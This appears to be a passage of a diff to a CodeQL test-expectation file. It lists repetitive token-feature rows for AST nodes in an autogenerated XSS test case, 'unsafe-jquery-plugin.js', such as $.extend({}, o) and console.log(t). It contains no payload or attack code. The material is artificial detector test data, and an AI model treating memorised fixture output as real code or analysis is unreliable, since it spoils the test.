options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | functio ... OK\\n\\t\\t} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | functio ... OK\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | functio ... OK\\n\\t\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | return of function f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | return of function f | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | return of function f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | return of function f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:12:85:12 | f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:14:85:14 | o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:7 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:7 | this | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:7 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:7 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:9 | this.o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:9 | this.o | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:9 | this.o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:9 | this.o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:27 | this.o ... ({}, o) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:27 | this.o ... ({}, o) | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:27 | this.o ... ({}, o) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:4:86:27 | this.o ... ({}, o) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:9:86:9 | o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:9:86:9 | o | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:9:86:9 | o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:9:86:9 | o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:13 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:13 | $ | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:13 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:13 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:20 | $.extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:20 | $.extend | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:20 | $.extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:20 | $.extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | $.extend({}, o) | assignedToPropName | o | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | $.extend({}, o) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | $.extend({}, o) | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | $.extend({}, o) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | $.extend({}, o) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | exceptional return of $.extend({}, o) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | exceptional return of $.extend({}, o) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | exceptional return of $.extend({}, o) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:13:86:27 | exceptional return of $.extend({}, o) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:15:86:20 | extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:15:86:20 | extend | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:15:86:20 | extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:15:86:20 | extend | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:22:86:23 | {} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:22:86:23 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:22:86:23 | {} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23877,6 +156090,58 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:26:86:26 | o | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:26:86:26 | o | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:86:26:86:26 | o | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:8 | t | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:8 | t | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:8 | t | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:8 | t | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t = this.o.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t = this.o.target | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t = this.o.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:8:87:24 | t = this.o.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:15 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:15 | this | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:15 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:15 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:17 | this.o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:17 | this.o | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:17 | this.o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:17 | this.o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:24 | this.o.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:24 | this.o.target | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:24 | this.o.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:12:87:24 | this.o.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:17:87:17 | o | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:17:87:17 | o | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:17:87:17 | o | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:17:87:17 | o | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:19:87:24 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:19:87:24 | target | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:19:87:24 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:87:19:87:24 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:10 | console | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:10 | console | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:10 | console | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:10 | console | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:14 | console.log | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:14 | console.log | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:14 | console.log | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:14 | console.log | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | console.log(t) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | console.log(t) | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | console.log(t) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | console.log(t) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | exceptional return of console.log(t) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | exceptional return of console.log(t) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | exceptional return of console.log(t) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:4:89:17 | exceptional return of console.log(t) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:12:89:14 | log | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:12:89:14 | log | contextSurroundingFunctionParameters | (o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:12:89:14 | log | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:12:89:14 | log | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | CalleeFlexibleAccessPath | console.log | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23884,12 +156149,143 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:89:16:89:16 | t | receiverName | console | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:90:4:90:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| 